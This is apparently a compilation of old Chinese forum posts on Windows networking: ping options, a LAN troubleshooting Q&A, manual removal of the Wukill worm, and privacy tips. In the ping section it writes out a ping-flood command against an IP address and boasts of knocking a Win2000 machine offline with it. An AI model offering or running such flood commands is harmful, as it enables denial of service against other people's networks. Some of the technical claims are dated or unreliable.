51ms, Average = 46ms 從以上我就可以知道在給202.103.96.68發送50個數據包的過程當中,返回了48個,其中有兩個由於未知原因丟失,這48個數據包當中返回速度最快為40ms,最慢為51ms,平均速度為46ms。 -l size Send buffer size. 定義echo數據包大小。 在默認的情況下windows的ping發送的數據包大小為32byt,我們也可以自己定義它的大小,但有一個大小的限制,就是最大只能發送65500byt,也許有人會問為什麼要限制到65500byt,因為Windows系列的系統都有一個安全漏洞(也許還包括其他系統)就是當向對方一次發送的數據包大於或等於65532時,對方就很有可能擋機,所以微軟公司為了解決這一安全漏洞於是限制了ping的數據包大小。雖然微軟公司已經做了此限制,但這個參數配合其他參數以後危害依然非常強大,比如我們就可以通過配合-t參數來實現一個帶有攻擊性的命令:(以下介紹帶有危險性,僅用於試驗,請勿輕易施於別人機器上,否則後果自負) C:\>ping -l 65500 -t 192.168.1.21 Pinging 192.168.1.21 with 65500 bytes of data: Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 ……………… 這樣它就會不停的向192.168.1.21計算機發送大小為65500byt的數據包,如果你只有一台計算機也許沒有什麼效果,但如果有很多計算機那麼就可以使對方完全癱瘓,我曾經就做過這樣的試驗,當我同時使用10台以上計算機ping一台Win2000Pro系統的計算機時,不到5分鐘對方的網路就已經完全癱瘓,網路嚴重堵塞,HTTP和FTP服務完全停止,由此可見威力非同小可。 -f Set Don`t Fragment flag in packet. 在數據包中發送「不要分段」標誌。 在一般你所發送的數據包都會通過路由分段再發送給對方,加上此參數以後路由就不會再分段處理。 -i TTL Time To Live. 指定TTL值在對方的系統里停留的時間。 此參數同樣是幫助你檢查網路運轉情況的。 -v TOS Type Of Service. 將「服務類型」欄位設置為 tos 指定的值。 -r count Record route for count hops. 在「記錄路由」欄位中記錄傳出和返回數據包的路由。 在一般情況下你發送的數據包是通過一個個路由才到達對方的,但到底是經過了哪些路由呢?通過此參數就可以設定你想探測經過的路由的個數,不過限制在了9個,也就是說你只能跟蹤到9個路由,如果想探測更多,可以通過其他命令實現,我將在以後的文章中給大家講解。以下為示例: C:\>ping -n 1 -r 9 202.96.105.101 (發送一個數據包,最多記錄9個路由) Pinging 202.96.105.101 with 32 bytes of data: Reply from 202.96.105.101: bytes=32 time=10ms TTL=249 Route: 202.107.208.187 -> 202.107.210.214 -> 61.153.112.70 -> 61.153.112.89 -> 202.96.105.149 -> 202.96.105.97 -> 202.96.105.101 -> 202.96.105.150 -> 61.153.112.90 Ping statistics for 202.96.105.101: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 10ms, Maximum = 10ms, Average = 10ms 從上面我就可以知道從我的計算機到202.96.105.101一共通過了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97這幾個路由。 -s count Timestamp for count hops. 指定 count 指定的躍點數的時間戳。 此參數和-r差不多,只是這個參數不記錄數據包返回所經過的路由,最多也只記錄4個。 -j host-list Loose source route along host-list. 利用 computer-list 指定的計算機列表路由數據包。連續計算機可以被中間網關分隔(路由稀疏源)IP 允許的最大數量為 9。 -k host-list Strict source route along host-list. 利用 computer-list 指定的計算機列表路由數據包。連續計算機不能被中間網關分隔(路由嚴格源)IP 允許的最大數量為 9。 -w timeout Timeout in milliseconds to wait for each reply. 指定超時間隔,單位為毫秒。 此參數沒有什麼其他技巧。 ping命令的其他技巧:在一般情況下還可以通過ping對方讓對方返回給你的TTL值大小,粗略的判斷目標主機的系統類型是Windows系列還是UNIX/Linux系列,一般情況下Windows系列的系統返回的TTL值在100-130之間,而UNIX/Linux系列的系統返回的TTL值在240-255之間,當然TTL的值在對方的主機里是可以修改的,Windows系列的系統可以通過修改註冊表以下鍵值實現: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters] "DefaultTTL"=dword:000000ff 255---FF 128---80 64----40 32----20 好了,ping命令也基本上完全講解完了,其中還有-j,-k參數我還沒有詳細說明,由於某些原因也包括我自己所收集的資料過少這裡也沒有向大家詳細介紹,請大家見諒,如果在看了這篇文章的朋友當中有知道得比我更多的,以及其他使用技巧的也希望您能告訴我,並在此先謝過。 區域網應用問題專題解答 (Rayi々) 1、問:我訪問區域網中的計算機時,為什麼常常被提示要輸入用戶名和密碼? 答:這主要是為了安全方面的考慮。而且當你重新啟動計算機時又要重新輸入用戶名和密碼,這一點確實讓人會覺得很麻煩。 你只要在需要進行文件共享的計算機上建立一個相同的用戶名,並且使用相同的密碼,然後區域網中的計算機都利用這個用戶名和密碼登錄,這樣在網上鄰居中訪問對方計算機時就不需要輸入用戶名和密碼了。 2、問:上網瀏覽前在區域網中應如何對IE進行設置? 答:在區域網中使用代理伺服器上網瀏覽時,應對瀏覽器進行必要的設置。以IE為例,在瀏覽器中代理伺服器的設置方法為:用滑鼠右擊桌面上的IE圖標,在彈出的右鍵菜單中選擇「屬性」命令。在打開的「Internet 屬性」對話框中選擇「連接」項,然後點擊「區域網設置」,在「區域網(LAN)設置」對話框中選中「使用代理伺服器」,並輸入代理伺服器的地址以及埠。 默認對於HTTP、FTP瀏覽器都是使用相同的代理伺服器設置,如果對這些服務有不同的代理,你就需要進行其他的設置。 方法為:點擊「高級」按鈕,取消「對所有協議均使用相同的代理伺服器」,並分別在不同的服務中輸入各自的地址和埠,保存以上設置後,IE就可以使用代理伺服器上網了。 3、問:在區域網中應如何設置OutLook Express收發郵件? 答:在區域網中OE等電子郵件收發軟體同樣可以通過代理伺服器上網,只是不能再使用原來的單機撥號上網設置。而且相對於其他軟體的代理伺服器設置,郵件軟體的伺服器設置要更為特殊一點,其代理伺服器的類型必須是Socks4或Socks5的伺服器。假設所使用的代理伺服器的地址為:202.102.49.141,用戶的郵件地址為:jjxm@163.com。 那麼在OE中代理伺服器的設置方法為:打開OE後,選擇菜單「工具→賬戶」。在「Internet賬戶」中選擇「郵件」選項卡,然後在賬戶列表中選擇需要設置的賬戶,點擊「屬性」按鈕。在屬性窗口中選擇「伺服器」選項卡(圖1),在接收和發送郵件伺服器地址中輸入代理伺服器的地址(如202.102.49.141),並按「用戶名#郵件真實的收信地址」的命名規則,在賬戶名中輸入 「jjxm#POP3.163.com」,單擊「確定」保存後即可在代理伺服器中收發郵件了。 4、問:在由三台電腦組成的區域網中,我在其中一台電腦上用過Windows優化大師後,為什麼這台電腦就不能登錄網路,並且還提示找不到撥號適配器? 答:根據你說的情況,是沒有安裝「撥號網路」。解決方法是:在「控制面板」的「添加/刪除程序」中,選擇「Windows安裝程序」,在「組件」的「通訊」中選擇「撥號網路」,然後將Windows安裝盤放入光碟機進行安裝,重新啟動計算機後就可使用撥號網路了。 5、問:如何在區域網中設置QQ、ICQ等即時通訊軟體? 答:在QQ的主窗口中點擊「QQ2000」的按鈕,在其主菜單中選擇「系統參數」,在參數窗口中選擇「網路設置」選項卡。首先在「上網類型」中選擇「區域網接入Internet」,再選中「使用Socks5代理伺服器」,然後輸入伺服器的地址以及埠(圖2),如果代理伺服器中設定了用戶密碼,還需要輸入用戶名和密碼。輸入完畢後可以點擊「測試」按鈕來檢測其代理是否正常。最後單擊「確定」即可在代理伺服器中使用QQ了。 類似地,在ICQ中選擇「連接」中的「防火牆」,可以定義多個代理伺服器,如Socks4、Socks5、HTTPS等。你首先要確定並選擇所使用的代理伺服器類型,然後在「代理伺服器」部分輸入主機的地址、埠,如果代理伺服器設置了用戶密碼,還必須輸入用戶名和密碼。對於代理伺服器的類型、地址、埠等,如果你不太清楚,可以詢問網路管理員。 6、問:我想用NetMeeting進行區域網中的通話,應該如何設置? 答:如果你首次打開NetMeeting,軟體會自動啟動配置嚮導。在配置嚮導窗口點擊「下一步」,然後輸入你的基本信息(如姓名、E-mail等)。繼續單擊「下一步」,進入伺服器配置窗口,NetMeeting允許啟動時登錄到目標伺服器,這個功能是針對於普通上網用戶的,區域網用戶並不需要該功能,因此你必須取消該選項。繼續單擊「下一步」,選擇網路速度,必須選擇「區域網」,然後提示是否建立快捷方式,你可以根據需要進行選擇。接下來進行音頻調節測試後就完成了區域網中對NetMeeting的設置。 7、問:我知道在區域網內文件是可以共享的,但我想問的是,印表機和掃描儀應該如何共享? 答:先來說說印表機的共享方法。你可以先在區域網內找一台電腦,並把印表機連接到這台電腦上,然後按照說明書為印表機安裝好驅動程序。在Windows系統任務欄上,點擊「開始→設置→控制面板」,在「控制面板」窗口中雙擊「印表機」圖標,再用滑鼠右鍵單擊印表機圖標,在彈出的右鍵菜單上選擇「共享」,然後在打開的「印表機屬性」窗口上選擇「共享為」,並像共享文件那樣給被共享的印表機也起一個共享名,然後點擊「確定」即可。 關於掃描儀的共享設置,你首先要看一下你的掃描儀是否具有網路共享功能,是否配備了用於共享的驅動程序,也就是說只有部分掃描儀可以進行網路共享。另外不同型號掃描儀的共享設置差異很大,最好查閱一下掃描儀的說明書。 8、我用分機線上網,上網速度最大才48000bps,請問是何原因? 還有,將Modem放在主機箱側面,開機後(未打開Modem電源),家裡的電話就處於忙音狀態,如何解決? 答:第一個問題跟你的分機電話線或線接頭質量有很大關係,另外,如果你的Modem的速度平常都能接近48000bps,你也不要太在意,應該重點先看下它的實際下載速度是否令你滿意。第二個問題,肯定和你主機的電源等配件的電磁輻射強和屏蔽效果差有關,你如果不想對你的主機進行大換血的話,最好用物體在主機和Modem之間進行屏蔽,或將Modem離你的主機遠點,這是最好的辦法。 9、我新購的網卡在電腦上無法安裝,而在其他電腦上卻使用正常,這是怎麼回事? 答:如果在電腦中安裝好網卡後,系統沒有提示找到新硬體,你可運行「添加新硬體嚮導」來讓系統搜索新硬體。方法是單擊「開始」,指向「設置」,單擊「控制面板」,然後再雙擊「添加新硬體」。按照屏幕提示操作。你可選「讓Windows搜索新硬體嗎?」,單擊「是(推薦)」,然後再單擊「下一步」,讓系統找到網卡再安裝其驅動。 而如果出現以下任何現象,網卡或者網卡所在的插槽損壞: 1、「添加新硬體嚮導」檢測不到網卡; 2、「添加新硬體嚮導」能夠檢測到網卡,但無法正常工作。 為了確定到底是網卡還是插槽的問題,可以檢查網卡是否牢靠插入插槽之中。如果網卡已牢靠插入插槽之中,請改插到其他插槽之中試試。如果問題仍未解決,則可能是網卡損壞或與你的電腦不兼容,可更換之。 10、我的電腦出現「網上鄰居」中找不到其他聯網電腦的故障,如何解決? 答:「網上鄰居」是按工作組顯示計算機的。如果你的電腦沒有設置工作組名稱,打開「網上鄰居」時就可能看不到其他電腦。單擊「開始」,指向「設置」,單擊「控制面板」,雙擊「網路」,然後再單擊「標識」選項卡。你區域網中所有電腦「工作組」框中的名稱應為一樣,如有不同你可在此框中鍵入相同的工作組名稱,然後單擊「確定」重啟電腦既可。 此外,如果「網上鄰居」中不出現「整個網路」圖標,可能是在Windows中沒有安裝必要的網路組件。要與網路上的其他計算機連接,則必須安裝以下組件:Microsoft網路客戶、網路適配器、至少一種網路協議(如IPX/SPX、TCP/IP等)。可打開「網路」,檢查「配置」選項卡上的列表,確保已安裝了各種必要的網路組件。如有,你可重新安裝各種缺少的組件即可。 11、問:公司區域網,只有一台機器通過貓接入互聯網,現想其他機器接入互聯網,請問如何實現?答:這是一個比較典型的代理上網問題。你可以在帶貓的機器上安裝代理上網軟體(如Sygate、Wingate、Winproxy)或直接使用Windows自帶的共享上網功能上網(Windows 98第二版以上才帶此功能)。建議使用Sygate,該軟體設置較簡單。先撥號上網,後安裝Sygate,完畢後,Sygate將檢測互聯網的連接狀態,並自動設置。在其他需要代理上網的機器上,指定網關和DNS的 IP地址,步驟為網上鄰居→右鍵→屬性→TCP/IP協議→屬性→DNS,輸入當地ISP的IP地址→網關,輸入代理伺服器的IP地址→確定→重啟。設置完畢後,其他各項應用軟體均無須設置。12、問:區域網通過路由器、使用ADSL方式上網,如何使各工作站快速的獲得可以上網的IP地址而不手工去指定?答:假如使用Windows 2000,可以直接使用Windows 2000自帶的dhcp功能,首先建立一個作用域,然後為這個作用域添加DNS的搜索順序和路由器的IP地址,DNS搜索順序為當地ISP的IP地址,路由器的IP地址即設置成當前區域網的路由器IP地址,其他機器則不指定IP地址,如非使用Windows 2000,則可使用第三方的dhcp軟體,比如代理軟體sygate和wingate都帶有dhcp功能。13、問:公司要組建區域網,需要用到郵件伺服器和WWW伺服器,請問這兩種服務放到一台電腦里還是分別用兩台電腦?都用什麼軟體?謝謝!答:這兩種服務現在用的皆比較廣泛,可以只用一台計算機或用兩台都可以,當然具體根據貴單位的預算開支和流量來決定。假如流量不大的話,建議只使用一台機器即可。至於軟體方面,可以使用Windows 2000作伺服器平台,然後使用Imail或Easymail作為郵件服務軟體,www服務建議使用apache serve軟體,因為Windows 2000自帶的IIS存在許多漏洞,而且不安裝,在建立www伺服器後,需考慮支持的語言腳本,現在用的比較廣的是ASP和PHP,當然,具體使用哪種語言,很簡單,看你自己精通哪方面就使用哪方面的,還有一點你沒提供到的,就是很有必要建立一個ftp服務,你可使用u-ftp軟體,這款軟體在安裝和使用方面都不難。14、問:家裡原先有一台PII的計算機,最近又新增一台P4機器,操作系統都為Windows 98且已安裝網卡,現在我想把他們聯起來共享資源,該怎麼辦?答:你所提的實際上即現在應用的比較廣泛的對等網的連接。很簡單,因你已有網卡,你需做的使是購買適合長度的超五類線和2個RJ45的水晶頭,再去借一把打線鉗。然後再根據標準做一對跳線,即一頭採用T568A標準(具體線的排列是:白綠、綠、白橙、藍、白藍、橙、白棕、棕),另一頭採用T568B標準(白橙、橙、白綠、藍、白藍、綠、白棕、棕)。然後在操作系統中添加TCP/IP協議和Netbuei協議,把工作組設置為workgroup,計算機不能相同。15、問:辦公室機器桌面的「網上鄰居」圖標沒了,能上Internet,但無法瀏覽其他機器上的資源了,怎麼辦?答:說明你的Internet屬性完好,但網上鄰居屬性中的「Microsoft 網路用戶」這一客戶組件沒了。進到「控制面板」中雙擊「網路」,先在彈出的網路對話框中點按「添加」按鈕,再從隨後彈出的「請選擇網路組件類型」對話框中雙擊「客戶」,最後從隨後的「選擇網路客戶機」對話框的左側選擇「Microsoft」後再選擇「Microsoft 網路用戶」,「確定」再「確定」並據提示重啟計算機就ok啦!先回去解決這個問題吧你……16、問:辦公室機器桌面的網上鄰居圖標解決了且也能瀏覽其他機器的共享資源了,但發現右鍵中的「共享」命令沒了!怎麼辦?答:這是因為還缺少個「Microsoft網路上的文件與印表機共享」這一網路服務協議呢!先右擊桌面「網上鄰居」選「屬性」,對話框中點按「添加」按鈕,再從隨後彈出的「請選擇要安裝的網路組件」對話框中雙擊「服務」,最後從隨後的「選擇網路服務」對話框中選擇「Microsoft網路上的文件與印表機共享」,「確定」再「確定」並據提示重啟計算機就ok啦!17、問:右鍵中的「共享」命令已經顯身!但我設了共享不想讓別人從網上鄰居中看到這個共享目錄,只有自己知道且能實現異地機上有完全操作的許可權。答:找到你想要共享的文件夾並右鍵點選「共享…」----這裡我就以共享「D:Windows 98」為例,先選中「共享為」後在共享名「Windows 98(當然也可改名共享哦)」後加一英文狀態的「$」符,再選中「完全」並輸入設定好「密碼」,然後「確定」一次密碼就OK了。這樣一來,絕對保證別人從網上鄰居中看不到這個共享目錄的!那~~自己想從異地機上進入並實現完全操作時怎麼辦呢?呵呵,這麼辦:從異地機的地址欄中鍵入「\(機器名)$(你的共享目錄名)」並「ENTER」,再輸入密碼並確定後,就進入啦!這樣你可靜悄悄地實現異地機上在自己設定的共享目錄內進行完全操作啦!不過注意其中「」不能誤輸入成「/」哦!……好了,你會了嗎?18、問:一塊PCI匯流排的10/100自適應網卡,無法正常工作。主要表現在網路時斷時續,不管是不是Ping自己的IP地址,還是Ping對方的IP地址,都有這種情況發生。查看網卡的指示燈也出現同樣的現象。答:首先你可檢查Hub的連介面是不是出了故障,將該網卡接到其他埠上,如果問題依然如故,說明Hub沒有問題。然後你可用網卡隨盤附帶的測試程序盤查看網卡的有關參數,其IRQ值為5,再回到Windows 95/98操作系統,查看操作系統分配給網卡的參數值,其IRQ同樣應是5。此外,可檢查安裝該網卡的主板插槽是否有故障,你可打開機箱,將網卡換個PCI插槽試試。此外,你還可檢查CMOS參數設置,重新啟動計算機,進入CMOS狀態,選擇「PNP/PCI Configuration」一項,如果IRQ5後面的狀態為「Legacy ISA」(保留的ISA匯流排設備),就應當將IRQ5後面的狀態改為「PCI/ISA PNP」。19、問:我的電腦與一個對等網連接好了,但不能讀別人電腦上的數據,這是怎麼回事?答:可能是你沒有設置好資源共享:選擇「網路→配置→文件及列印共享」,將兩個選項全部打勾並確定,安裝成功的標誌是配置中出現了「Microsoft網路上的文件與印表機共享」選項,注意,還要檢查它與NetBEUI協議是否進行了綁定。選擇「配置」中的NetBEUI協議,點擊「屬性」按鈕,看綁定中「Microsoft網路上的文件與印表機共享」、「Microsoft網路用戶」前是否已經有對勾了。還要在「網路→標識」里將「計算機名」設置好,確定之後系統將重新啟動。20、問:我的網路從集線器升級為交換機後,感覺速度並沒有多大提高,是什麼原因?答:這種情況需要從以下幾個方面來分析:1、首先應確認網路是否工作在100M狀態,具體做法是:確認網線是五類以上線,網線做法遵循100M標準,網卡支持100M工作狀態,只有滿足以上條件,交換機才能工作於100M狀態,從而最大限度地體現交換機的性能優勢。2、如果網路在升級前工作正常,數據交換量不是很大,數據衝突和廣播風暴現象出現的不是很頻繁,那麼升級後網路性能的提升可能不是很明顯,這是正常現象。3、還有一種情況是因為網路結構設置不當引起的,例如,如果把集線器放在第一級連接伺服器,而把交換機放在下一級來連接工作站,這樣數據交換仍然通過集線器進行,交換機的性能優勢沒有體現出來。所以,在組網時應當充分考慮網路結構的合理性,應將性能較好的設備置於整個網路的最高級。21、問:VLAN是什麼意思,使用它有什麼好處?答:VLAN是Virtual Local Area Network的縮寫,即虛擬區域網的意思。VLAN的劃分有三種方式:基於埠(Port)、基於MAC地址和基於IP地址。通過劃分VLAN,可以把數據交換限制在各個虛擬網的範圍內,從而減少整個網路範圍內廣播包的傳輸,提高了網路的傳輸效率;同時各虛擬網之間不能直接進行通訊,而必須通過路由器轉發,起到了隔離埠的作用,為高級安全控制提供了可能,增強了網路的安全性。VLAN功能的適用性很廣,在數據交換較頻繁或對網路安全性有要求的環境均可適用,如:1、在智能小區、校園、企業等應用環境,使用VLAN功能可使不同VLAN間的機器不能互相訪問,可為網路安全控制提供良好保障;2、在遊戲廳、大中型企業等環境,使用VLAN可大大減少網路中不必要的數據交換的數量,杜絕廣播風暴,提升網路傳輸性能。22、問:我的自適應網卡只有紅燈閃爍,綠燈不亮,這種情況正常嗎?答:首先你應該了解一般自適應網卡紅燈和綠燈分別代表什麼含義——紅燈代表Link/Act(連通/工作),即連通時紅燈長亮,傳輸數據時閃爍;綠燈代表FDX(全雙工),即全雙工狀態時亮,半雙工狀態時滅。如果一個半雙工的網路設備(如Hub)和自適應網卡相連,由於這張網卡是自適應網卡,它也會工作在半雙工狀態,所以綠燈不亮也屬於正常情況。23、問:如何使用交換機的UpLink埠,怎樣連接?使用了UpLink口後,是否還可以使用其相鄰最近的埠?答:UpLink口是交換機上常見的一種埠,它是為了便於兩台交換機之間進行級聯的埠。它與其相鄰的普通UTP口使用的是同一通道,因而,如果使用了UpLink口,另一個與之相鄰的普通埠就不能再使用了。這兩個埠稱為共享埠,不能同時使用。級聯的時候,你可使用一般的網線(網線的兩端都遵循同一標準,即同是EIA/TIA 568A或568B)將一個交換機的普通埠和另一個交換機的UpLink口連起來。如兩個設備都使用UpLink口連接,網線需要一端使用EIA/TIA 568A的標準,另一端使用EIA/TIA 568B的標準(如下表)。標準568a 標準568b橙白1 綠白1橙2 綠2綠白 3 橙白3藍4 藍4藍白5 藍白5綠6 橙6棕白7 棕白7棕8 棕8 24、問:我在安裝網卡後,在「系統→設備管理器」中網卡出現黃色的「!」號,請問該如何解決?答:網卡較容易與其他設備發生資源衝突,尤其是在系統中安裝有多個插卡的情況下,解決辦法是:1、更換網卡在主板插槽上的位置是最好的解決辦法。2、在該網卡「屬性」窗口「資源」標籤中找到「資源類型」列表,選定發生衝突的「資源」,按「更改設置」按鈕,更改發生衝突的IRQ中斷號或者I/O地址。3、有些PCI網卡會強行佔用IRQ10,與一些強行佔用IRQ10的顯示卡發生IRQ中斷衝突,如果遇到這種情況,可在BIOS中將「Assign IRQ For VGA」項設置為Disabled,不給顯示卡分配固定的中斷。4、運行網卡附帶的軟盤中的設置程序,將網卡設置為非PNP模式,設置IRQ中斷號和I/O地址為系統未佔用的地址;並在BIOS中將相應中斷號由PCI/ISA改為Legacy ISA。如果使用上述方法均不能解決故障,建議換一塊網卡試試。25.問:ADSL上網網頁打不開的問題?答:是MTU的問題!改一下註冊表!HKEY_LOCAL_MACHINESystemCurrentControlSetServicesClassNetTrans�000主鍵下面建立字元串鍵名為MaxMTU,鍵值為1450查殺I-Worm.Wukill病毒(注意有變種了)的手工方法 (微笑)我是用手工殺的。金山毒霸好象還不行,跟本就不報警。 首先用進程管理工具(如「優化大師」帶的進程管理工具)把可疑的進程殺掉,再搜索最大不超過87KB的「*.EXE」文件,瑞星上說的自啟動「MSTRAY.EXE」文件不對,它好象有了新的變種,自啟動的文件名可以變換,而且有時每次重啟動都會變,也不一定在WINDOWS哪個目錄下,所以要查整個不超過87KB大小的.EXE文件,然後將所有圖標為文件夾樣式的.EXE文件刪掉。同時對照註冊表裡的RUN項,查找不正常的啟動項(建議也用優化大師,這樣好判別,毒霸的也可以),除刪掉啟動項外,還要再查找一次不正常啟動項對應的程序,並刪掉。注意:這步操作十分危險,建議由有經驗的人員操作。接著再分別查找comment.htt 和desktop.ini,把它們都刪掉。注意不要把「*:My Documents」下的這兩個文件刪了,一般這裡的都是正常文件(我自己用的笨辦法就是用記事本打開,看看裡面是不是MICROSOFT的東東)。最後重啟就OK了。瑞星的在2月份就可以殺了,毒霸好象到現在都不行,是它的破壞力太小所以毒霸不屑一顧?????!!!!!!!!剛又看了看前人的貼,發現這個傢伙變種變的還是蠻快的。其中最大的變化就是自啟動項的變化,這個病毒我遇到的最厲害的是在內存中同時有不同文件名的3個進程,並且自啟動項的名稱也不斷變化,但WINFILE.EXE這個文件始終存在,而且一般是在根目錄下,並陪隨comment.htt 和desktop.ini這兩個文件,可能這可以算為標誌性文件之一了。在其它的目錄下,則會根據你實際存在的目錄名而更換自己的名稱(呵,呵,這一點我比較佩服),不過無論它怎麼換名,文件大小大都是約在85KB左右(具體位元組我沒有記錄)。建議懷疑自己中毒時,把「隱藏已知文件類型的擴展名」這個選項去掉,如果有文件夾圖標的.EXE文件,那麼恭喜你---------------中毒了!!!!!另:正常的WINFILE.EXE文件大小為151419位元組,且圖標為一個文件櫃樣式。在網上看到了一篇貼子。I-Worm.Wukill破壞方法:這個病毒採用文件夾圖標,具有很大迷惑性。該病毒運行後,會將自己大量複製到其他目錄中。 一、 病毒首次運行時將顯示"This File Has Been Damage!"; 二、 將自己複製到windows目錄下並改名為Mstray.exe; 三、 修改註冊表: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentversionRun 以達到其自啟動的目的; 四、 枚舉磁碟目錄,在每個根目錄下釋放下列文件: winfile.exe 病毒主體程序 coment.htt 利用IE漏洞調用同一個目錄下的"winfile.exe",屬性為隱藏。 desktop.ini 系統為隱藏。採用web方式瀏覽文件夾時,系統會調用該文件,該文件調用coment.htt ,從而激活病毒。 五、 病毒修改註冊表,隱藏系統文件、隱藏受系統保護的文件、隱藏已知的擴展名稱。 這樣,用戶看不到coment.htt和desktop.ini, winfile.exe被隱藏後綴明,又是文件夾圖標,用戶極容易認為是文件夾而點擊。 同時病毒在當前路徑下生成的自身拷貝,名稱採用上級目錄,或者是當前窗口的標題,增加隱蔽性。 六、病毒調用Outlook發送攜帶病毒的信件。 你先試試:1 [在運行里輸入REGEDIT (進入註冊表編輯器) 在編輯工具里點吉查找 輸winfile 確定,即輸出winfile.ini 刪除它 然後回盤裡就可以刪除了 !] 2 用KV2004升級版在網上進行了最新的升級後,運行KV2004就可以了利用Ping命令判定網路故障 (sindasun) Ping 是Windows系列自帶的一個可執行命令。利用它可以檢查網路是否能夠連通,用好它可以很好地幫助我們分析判定網路故障。應用格式:Ping IP地址。該命令還可以加許多參數使用,具體是鍵入Ping按回車即可看到詳細說明。 #11.Ping本機IP 例如本機IP地址為:172.168.200.2。則執行命令Ping 172.168.200.2。如果網卡安裝配置沒有問題,則應有類似下列顯示: Replay from 172.168.200.2bytes=32 time<10ms Ping statistics for 172.168.200.2 PacketsSent=4 Received=4Lost=00% loss Approximate round trip times in milli-seconds Minimum=0msMaxiumu=1msAverage=0ms 如果在MS-DOS方式下執行此命令顯示內容為:Request timed out,則表明網卡安裝或配置有問題。將網線斷開再次執行此命令,如果顯示正常,則說明本機使用的IP地址可能與另一台正在使用的機器IP地址重複了。如果仍然不正常,則表明本機網卡安裝或配置有問題,需繼續檢查相關網路配置。 #12.Ping網關IP 假定網關IP為:172.168.6.1,則執行命令Ping 172.168.6.1。在MS-DOS方式下執行此命令,如果顯示類似以下信息: Reply from 172.168.6.1 bytes=32 time=9ms TTL=255 Ping statistics for 172.168.6.1 PacketsSent=4Received=4Lost=00% loss Approximate round trip times in milli-seconds Minimum=1msMaximum=9msAverage=5ms 則表明區域網中的網關路由器正在正常運行。反之,則說明網關有問題。 #13.Ping遠程IP 這一命令可以檢測本機能否正常訪問Internet。比如本地電信運營商的IP地址為:202.102.48.141。在MS-DOS方式下執行命令:Ping 202.102.48.141,如果屏幕顯示: Reply from 202.102.48.141 bytes=32 time=33ms TTL=252 Reply from 202.102.48.141 bytes=32 time=21ms TTL=252 Reply from 202.102.48.141 bytes=32 time=5ms TTL=252 Reply from 202.102.48.141 bytes=32 time=6ms TTL=252 Ping statistics for 202.102.48.141 PacketsSent=4Received=4Lost=00% loss Approximate round trip times in milli-seconds Minimum=5msMaximum=33msAverage=16ms 則表明運行正常,能夠正常接入互聯網。反之,則表明主機文件(windows/host)存在問題。 東西搶註:注意一下:衝擊波之後的DNS伺服器都是禁止PING的也就是關閉了ICMP協議的這樣大家可以使用TRACERT這個命令跟蹤數據包,也是可以同樣達到目的當心電腦暴露你的隱私 (sindasun)如果使用的是辦公室、網吧等地的公共用機,你的很多秘密就可能暴露在別人眼前。 #1一、操作系統 如果想把屬於隱私的圖片、視頻片斷或者重要文檔文件等保存在公共電腦中,很多人採取的辦法把文件或文件夾的屬性改為「隱藏」,然後再把它們藏匿在電腦中某個不起眼的文件夾里。可在Win 98的「開始」→「文檔」菜單中,會記錄最近打開過的15個文件名,因此別人可以點擊相應的文件名來打開文件,就算你已經把文件藏起來了,別人也可以從這裡窺視你的秘密。 解決辦法:要清除這些痕迹,你可以用滑鼠右鍵點擊任務欄的「屬性」,後點「開始菜單程序」,再點「清除」就可以刪除「文檔」菜單中的內容和其他個人歷史記錄列表了。這樣做可以在一定程度上保護你的秘密,但別人還可以通過「開始」菜單中的「查找」功能來搜索你的重要文件,按文件的類別把硬碟上所有的圖形文件、*.txt、*.doc文件等找出來,然後一個一個地查看,秘密依然存在被泄露的可能。 報紙上曾介紹過一種修改註冊表隱藏硬碟的辦法,即把要隱藏的文件專門放到某個硬碟(如F盤)上,然後修改註冊表把這個盤藏起來(在HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer下新建一個Dword值「NoDrives」,再設置鍵值,例如把鍵值設為20就可以隱藏F盤),在資源管理器中就看不到這個盤了。這種辦法表面上無懈可擊,被隱藏的盤對於大多數軟體都不可見,你通過「查找」功能也無法找到該盤上的文件,一些所謂的電腦高手也把這種辦法當做可靠的保密手段。然而這種方法有重大的漏洞,在DOS狀態下這個盤完全可見,而在Windows下,我找到一種非常簡單的辦法破除這種限制。只要在「我的電腦」或者IE瀏覽器的地址欄中鍵入盤符「F:」,然後打回車鍵,這個盤的內容就一覽無餘,所有的秘密蕩然無存。 解決辦法:如果對保密的要求比較高,可以用一些軟體來加密或者隱藏,可以基本解決保密問題。但是,就算是用加密/隱藏軟體,也不是十分安全的。一方面有些隱藏軟體有漏洞,對於熟悉計算機的用戶來說,並不難破解限制;另一方面一些加密/隱藏軟體的加密程度不高,可找到相應的軟體來破解密碼。所以對於保密要求非常高的用戶來說,如果是比較小的文件,最好不要保存在硬碟上,可以保存在軟盤上,如果文件太大,不能保存在軟盤上,可以用PGP之類的超強加密軟體來加密。 #1二、常用程序 Windows下的很多應用程序,如Word、Excel、媒體播放器Media Player、RealPlayer等,會在該程序「文件」菜單下列出最近打開過的一些文件名。儘管你已經把文件藏匿在電腦中的某個地方了,但別人還是可以通過這些文件名清單輕易打開相應的文件。 解決辦法:對於Word 2000、Excel 2000等,可以在Word/Excel的「工具」→「選項」的「常規」選項卡中把「列出最近所用文件」的個數改為0;在媒體播放器和Realplayer中清除這些歷史記錄,只能到註冊表中刪除,要清除Realplayer中的歷史記錄,則到HKEY_LOCAL_MACHINESoftwareCLASSESSoftwareRealNetworksRealplayer6.0PreferencesMostRecentClips1刪除相關鍵值(Realplayer默認情況下是在「文件」菜單中顯示最近播放過的8個剪輯,Mostrecentclip1隻是第一個,要刪除其他幾個你還須要分別刪除)。要清除媒體播放器上的記錄只有到註冊表中,刪除HKEY_HKEY_CURRENT_USERSoftwareMicrosoftMediaPlayerPlayerRecentFileList下的鍵值。通過註冊表來清除歷史記錄比較麻煩,而且對新手來說具有一定危險性。 